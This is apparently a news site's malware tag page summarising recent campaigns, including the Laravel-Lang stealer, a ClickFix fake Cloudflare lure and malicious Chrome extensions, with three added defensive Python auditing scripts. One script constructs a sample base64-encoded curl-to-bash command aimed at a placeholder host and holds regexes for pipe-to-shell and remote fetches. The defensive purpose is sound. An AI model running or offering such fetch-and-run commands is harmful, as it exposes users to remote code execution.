Tag

Malware

All articles tagged with #malware

GTA 6 Pre-Order Buzz Triggers Malware Warnings
technology, 5 hours ago

GTA 6's release hype has outpaced official pre-orders, and scammers have filled the gap: fake sites promise free codes, beta keys or exclusive trailers and deliver malware through bogus installers and phishing pages. NordVPN Threat Intelligence found clone sites and trojanized Android adware aimed at fans; its advice is to trust only official channels for GTA 6 information and access.

Massive Laravel-Lang Breach Sparks Cross-Platform Credential Theft
cybersecurity, 2 days ago

Security researchers warn of a broad compromise of Laravel-Lang PHP packages (laravel-lang/lang, http-statuses, attributes, actions) in which a malicious src/helpers.php was injected into the packages' autoloaded vendor files, so it executes on every application start. More than 700 package versions were tagged in rapid succession in May 2026, suggesting the attackers had access to the Laravel Lang release infrastructure. The embedded dropper fetches a roughly 5,900-line PHP credential stealer that collects cloud tokens, service credentials, browser data, VPN configs and more, encrypts the results with AES-256, exfiltrates them to flipboxstudio.info, and then self-deletes. On Windows the dropper launches the payload through a VBScript launcher; on Linux and macOS it runs it via the shell. Remediation: audit dependencies, upgrade to clean versions, rotate any credentials the affected hosts held, and monitor for the published indicators of compromise.
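A quick way to act on the first remediation step above, auditing dependencies, is to scan the application's composer.lock for the affected packages and for the autoload entry the advisory describes. The script below is an added example, not code from the researchers or the Laravel Lang project; the package names and the src/helpers.php path come from the summary, while the lock-file fragment and its version numbers are constructed for the demo.

```python
"""Flag laravel-lang packages in a composer.lock whose autoload "files" list
includes a src/helpers.php, the path the advisory above says was injected.

Added example, not code from the researchers or the Laravel Lang project.
Package names and the file path come from the summary; the lock-file content
and version numbers below are constructed."""
import json

WATCHED = {
    "laravel-lang/lang",
    "laravel-lang/http-statuses",
    "laravel-lang/attributes",
    "laravel-lang/actions",
}
SUSPICIOUS_SUFFIX = "src/helpers.php"


def watched_packages(lock_json: str) -> dict[str, str]:
    """Map each installed watched package to its locked version, so you know
    what to upgrade and which hosts' credentials need rotating."""
    lock = json.loads(lock_json)
    found = {}
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") in WATCHED:
                found[pkg["name"]] = pkg.get("version", "?")
    return found


def audit_lock(lock_json: str) -> list[dict]:
    """Return one finding per watched package that autoloads a src/helpers.php.
    Composer executes every "files" entry on each boot, so such an entry must
    be compared against a known-clean release before it is trusted."""
    lock = json.loads(lock_json)
    findings = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            name = pkg.get("name", "")
            if name not in WATCHED:
                continue
            files = pkg.get("autoload", {}).get("files", [])
            hits = [f for f in files
                    if f.replace("\\", "/").endswith(SUSPICIOUS_SUFFIX)]
            if hits:
                findings.append({
                    "package": name,
                    "version": pkg.get("version", "?"),
                    "section": section,
                    "files": hits,
                })
    return findings


# Constructed composer.lock fragment (versions and namespaces are invented).
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "laravel-lang/lang", "version": "v15.0.0",
         "autoload": {"psr-4": {"LaravelLang\\Lang\\": "src/"},
                      "files": ["src/helpers.php"]}},
        {"name": "laravel-lang/attributes", "version": "v2.0.0",
         "autoload": {"psr-4": {"LaravelLang\\Attributes\\": "src/"}}},
        {"name": "monolog/monolog", "version": "3.5.0",
         "autoload": {"psr-4": {"Monolog\\": "src/Monolog"}}},
    ],
    "packages-dev": [],
})

if __name__ == "__main__":
    print("watched packages installed:", watched_packages(SAMPLE_LOCK))
    for f in audit_lock(SAMPLE_LOCK):
        print(f"REVIEW {f['package']} {f['version']}: autoloads {f['files']}")
```

Run it against a real lock file with audit_lock(Path("composer.lock").read_text()). A hit is a prompt to diff the locked release against a known-clean one, not proof of compromise on its own, and the generated vendor/composer/autoload_files.php should be checked too, since a compromised host can carry entries the lock never listed.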

Kash Patel's merch site hacked to push malware through a fake Cloudflare check
technology, 4 days ago

A Based Apparel storefront tied to Kash Patel was compromised: visitors were shown a modified Cloudflare verification page urging them to paste a command into their terminal, and doing so installed a macOS infostealer that harvests credentials, browser data, crypto-wallet extension data and keychain items. A payment skimmer is also suspected. The attackers used a malicious WordPress plugin, though how they gained initial access remains unclear. Patel has distanced himself from the store, and no FBI involvement has been confirmed.

Kash Patel’s Based Apparel Site Used as Mac Malware Lure with Fake Cloudflare Page
technology, 4 days ago

Security researchers flagged BasedApparel.com, Kash Patel's apparel site, for hosting a ClickFix-style scam: macOS visitors see a fake Cloudflare verification page that instructs them to copy and paste a command into Terminal. The copied text decodes to a hidden shell script that downloads malware capable of stealing browser credentials and crypto-wallet data and exfiltrating them to an attacker-controlled domain. The case shows how compromised legitimate sites can deliver infostealers through scareware; Apple has added protections against pasted Terminal commands in macOS 26.4. Based Apparel did not comment.
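Both Based Apparel reports describe the same ClickFix mechanic: a fake verification page hands the visitor a Terminal one-liner whose base64 blob hides the real script. The habit that defeats it is to decode before running anything a web page told you to paste. The inspector below is an added example, not code from the researchers, Apple, or the site involved; the lure it inspects is constructed and points at a reserved .invalid host rather than the domain used in the attack.

```python
"""Inspect a command that a web page asked the user to paste into Terminal.

Added example for the ClickFix pattern described above; not code from the
researchers or from the site involved. It peels base64 layers and reports
the indicators a pasted-command lure typically carries. The sample lure is
constructed here, not the one served by the compromised site."""
import base64
import binascii
import re

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
INLINE_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
FETCHER = re.compile(r"\b(?:curl|wget)\b")
HIDE_OUTPUT = re.compile(r">\s*/dev/null")
MAX_DEPTH = 3


def decode_blobs(text: str) -> list[str]:
    """Return every base64 run in text that decodes to readable UTF-8."""
    out = []
    for m in B64_BLOB.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\n\t\r" for c in decoded):
            out.append(decoded)
    return out


def indicators_for(layer: str) -> list[str]:
    """Static indicators for one layer of the command."""
    hits = []
    if PIPE_TO_SHELL.search(layer):
        hits.append("pipes into a shell")
    if INLINE_DECODE.search(layer):
        hits.append("decodes base64 inline")
    if FETCHER.search(layer):
        hits.append("fetches a remote resource")
    if HIDE_OUTPUT.search(layer):
        hits.append("hides output")
    return hits


def inspect_pasted_command(cmd: str) -> dict:
    """Walk the command and each decoded layer beneath it (up to MAX_DEPTH),
    collecting indicators. The verdict is 'suspicious' if any layer pipes into
    a shell, or if a fetch only appears once an encoded layer is peeled."""
    layers = [cmd]
    frontier = [cmd]
    for _ in range(MAX_DEPTH):
        nxt = []
        for text in frontier:
            for inner in decode_blobs(text):
                layers.append(inner)
                nxt.append(inner)
        frontier = nxt
        if not frontier:
            break
    indicators = [f"layer {depth}: {ind}"
                  for depth, layer in enumerate(layers)
                  for ind in indicators_for(layer)]
    suspicious = any("pipes into a shell" in i for i in indicators) or (
        len(layers) > 1 and any("fetches" in i for i in indicators))
    return {"layers": layers, "indicators": indicators,
            "verdict": "suspicious" if suspicious else "benign"}


# Constructed lure: the visible command hides a curl-to-bash one-liner.
HIDDEN = "curl -fsSL http://example.invalid/p.sh | bash"
SAMPLE_LURE = ('echo "' + base64.b64encode(HIDDEN.encode()).decode()
               + '" | base64 -d | bash')

if __name__ == "__main__":
    result = inspect_pasted_command(SAMPLE_LURE)
    print(result["verdict"])
    for line in result["indicators"]:
        print(" ", line)
    print("decoded layer:", result["layers"][1])
```

The decoder is deliberately conservative: it only follows blobs that decode to readable text, so a gzip or binary stage stops the walk and shows up as an undecoded layer, which is itself a reason not to run the command.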

Fast16: The 2005 cyberattack that sabotaged Iran's nuclear-test simulations alongside Stuxnet
technology, 8 days ago

Researchers confirm that Fast16, malware dating from 2005, was built to subvert the high-precision simulations used to model nuclear explosions by feeding engineers false data, with the aim of slowing Iran's nuclear program. Where Stuxnet sabotaged centrifuges, Fast16 targeted the simulation software itself (LS-DYNA and AUTODYN), producing misleading results that could delay progress without any physical effect. Analysts say the code predates Stuxnet but operated alongside it, and was likely developed by the US, Israel or allies to buy time for negotiations.

AI-Designed Zero-Day Bypasses 2FA in Mass Exploitation Campaign
cybersecurity, 15 days ago

Google Threat Intelligence Group disclosed a zero-day exploit, likely AI-assisted, that bypasses 2FA on a popular open-source admin tool and was used in a mass exploitation campaign. The Python-based exploit shows patterns typical of LLM-generated code. Google coordinated with the vendor to patch the flaw and disrupt the operation; the same report also covers broader AI-enabled threats, including autonomous malware and AI-assisted misuse of Gemini.

Fake OpenAI Privacy Filter Repo Delivers Windows Infostealer on Hugging Face
security, 15 days ago

A clone of OpenAI's Privacy Filter on Hugging Face impersonated the legitimate model to distribute a Windows infostealer. Its loader retrieves payloads through Base64-encoded data, JSON Keeper and PowerShell, then registers a one-shot scheduled task to run the final malware, which exfiltrates screenshots, crypto wallets and browser data to a remote domain while attempting to evade detection by disabling AMSI and ETW. The repo reached #1 with about 244,000 downloads before being disabled; researchers link it to similar loaders and to ValleyRAT-related campaigns targeting open-source ecosystems.

JDownloader supply-chain breach delivers Python RAT through fake installers
technology, 16 days ago

Between May 6 and 7, 2026, the official JDownloader site was compromised so that Windows and Linux installer downloads were redirected to malicious payloads. The Windows dropper installs a Python-based RAT; the Linux installer downloads two ELF binaries, sets up persistence and masquerades as a system process. The attackers had CMS access but not full control of the server's operating system. Only the alternative Windows installer and the Linux shell installer were affected; other downloads remained clean. Users should verify the digital signature (AppWork GmbH) on any installer, reject unsigned or differently signed files, and, if infected, reinstall the OS and reset passwords. Researchers have published IOCs for further analysis.

CloudZ RAT Hijacks Phone Link to Steal SMS OTPs via Pheno Plugin
security, 20 days ago

A new CloudZ RAT variant carrying a Pheno plugin watches for active Microsoft Phone Link sessions and reads the local Phone Link SQLite database to harvest SMS messages and one-time passwords, enabling credential theft without touching the phone itself. Infection starts with a fake ScreenConnect updater that drops a Rust loader, followed by a .NET loader that installs the RAT, sets up persistence and runs anti-analysis checks to evade sandboxes. Defenders are advised to move away from SMS-based OTPs toward non-push authenticators or hardware keys; Cisco Talos has published indicators of compromise.

Hackers forge Apple-approved Mac apps by stealing developer keys, warns Tom’s Guide
technology, 1 month ago

Mosyle Security describes two Mac-focused malware families, Phoenix Worm and ShadeStager, that steal developers' signing keys and cloud credentials so that malicious software can be signed as Apple-verified. With stolen keys, attackers can get past Gatekeeper and slip malware onto Macs, potentially affecting over 100 million users. The finding underlines the need for caution with apps from outside the Mac App Store, vigilance against phishing aimed at developers, and attention to macOS warnings; developers should also protect their credentials to prevent this kind of code-signing abuse.

Unmasked: 108 Chrome Extensions Leak Google and Telegram Data
technology, 1 month ago

Security researchers found 108 Chrome extensions, published under five developer accounts but controlled by a single operator, that steal Google account data and Telegram messages; together they have about 20,000 installations. The extensions can backdoor URLs, inject HTML and exfiltrate Telegram Web sessions every 15 seconds; some also capture Google sign-in credentials, and the translation tools among them reveal users' email addresses. Users should audit their installed extensions, log out of Telegram Web sessions, review third-party app permissions and avoid dubious extension listings.

108 Chrome extensions quietly exfiltrate data and inject ads across sites — remove them now
computing, 1 month ago

Security researchers found 108 malicious Chrome extensions, disguised as games, utilities or add-ons, that quietly siphon user data and inject ads into every site. Despite the different publishers, all stolen data goes to a single command-and-control server; 54 of the extensions harvest Gmail addresses, full names and Google 'sub' IDs to build a persistent profile of each victim. If any of them is installed, remove it through the Chrome or Edge extensions manager. To stay safe, install only trusted extensions, inspect the permissions they request, enable Enhanced Safe Browsing, and consider antivirus and identity protection against similar threats.

Hundreds of Chrome extensions harvest Google tokens and Telegram sessions
technology, 1 month ago

Security researchers found over 100 malicious Chrome Web Store extensions from five publishers that steal Google OAuth2 Bearer tokens, harvest account data, hijack Telegram Web sessions and run backdoors through a centralized C2. The campaign, likely a Russian malware-as-a-service operation, is still active in the store; Google has been notified, and users should uninstall any matching extensions.
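The three extension reports above all end with the same advice: audit what is installed. The script below is an added example rather than the researchers' own tooling. It reads manifest.json files from a Chrome profile's Extensions directory (real layout: Extensions/<id>/<version>/manifest.json) and scores each extension on the combination the campaign relied on, broad host access together with content scripts on Google or Telegram Web. The sample manifests, their ids and the scoring weights are constructed for the demo.

```python
"""Score installed Chrome extensions by the access their manifest requests.

Added example, not code from the researchers who found the 108 extensions.
It reads manifest.json files from a Chrome profile's Extensions directory
(layout Extensions/<id>/<version>/manifest.json) and flags broad host access
combined with content scripts on Google or Telegram Web. Weights, thresholds
and the sample manifests are constructed."""
import json
from pathlib import Path

SENSITIVE_PERMISSIONS = {
    "cookies": 2, "webRequest": 2, "webRequestBlocking": 2, "scripting": 2,
    "identity": 2, "proxy": 2, "tabs": 1, "history": 1, "clipboardRead": 1,
    "declarativeNetRequest": 1,
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
SENSITIVE_SITES = ("web.telegram.org", "accounts.google.com", "mail.google.com")
REVIEW_THRESHOLD = 5


def host_patterns(manifest: dict) -> set[str]:
    """Host patterns from MV3 host_permissions and MV2-style permissions."""
    hosts = set(manifest.get("host_permissions", []))
    hosts.update(p for p in manifest.get("permissions", [])
                 if "://" in p or p == "<all_urls>")
    return hosts


def score_manifest(manifest: dict) -> tuple[int, list[str]]:
    """Additive risk score plus the reasons behind it."""
    score, reasons = 0, []
    for perm in manifest.get("permissions", []):
        weight = SENSITIVE_PERMISSIONS.get(perm, 0)
        if weight:
            score += weight
            reasons.append(f"permission {perm}")
    if host_patterns(manifest) & BROAD_HOSTS:
        score += 3
        reasons.append("host access to all sites")
    for cs in manifest.get("content_scripts", []):
        for pattern in cs.get("matches", []):
            if pattern in BROAD_HOSTS or any(s in pattern for s in SENSITIVE_SITES):
                score += 3
                reasons.append(f"content script on {pattern}")
                break
    return score, reasons


def audit_manifests(manifests: dict[str, dict]) -> list[dict]:
    """manifests: extension id -> parsed manifest.json. Highest score first."""
    report = []
    for ext_id, m in manifests.items():
        score, reasons = score_manifest(m)
        report.append({"id": ext_id, "name": m.get("name", "?"), "score": score,
                       "reasons": reasons, "review": score >= REVIEW_THRESHOLD})
    return sorted(report, key=lambda r: r["score"], reverse=True)


def load_profile(profile_dir: str) -> dict[str, dict]:
    """Read every manifest under <profile>/Extensions/<id>/<version>/."""
    found = {}
    for path in Path(profile_dir).glob("Extensions/*/*/manifest.json"):
        found[path.parent.parent.name] = json.loads(path.read_text(encoding="utf-8"))
    return found


# Constructed manifests: the ids are invented, not those from the reports.
SAMPLE_MANIFESTS = {
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {
        "name": "Quick Translate", "manifest_version": 3,
        "permissions": ["cookies", "scripting", "tabs", "storage"],
        "host_permissions": ["<all_urls>"],
        "content_scripts": [{"matches": ["*://web.telegram.org/*"], "js": ["t.js"]}],
    },
    "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {
        "name": "Dark Theme", "manifest_version": 3,
        "permissions": ["storage"],
        "content_scripts": [{"matches": ["https://example.invalid/*"], "js": ["d.js"]}],
    },
}

if __name__ == "__main__":
    for r in audit_manifests(SAMPLE_MANIFESTS):
        flag = "REVIEW" if r["review"] else "ok    "
        print(flag, r["id"], r["name"], r["score"], "; ".join(r["reasons"]))
```

On Linux the default profile is ~/.config/google-chrome/Default and on macOS ~/Library/Application Support/Google/Chrome/Default; pass that path to load_profile(). Names in real manifests are often __MSG_ placeholders resolved from _locales, and a high score marks an extension for review rather than as malicious: legitimate password managers and ad blockers request similar access, so a flagged extension should be matched against the ids the researchers published before it is removed.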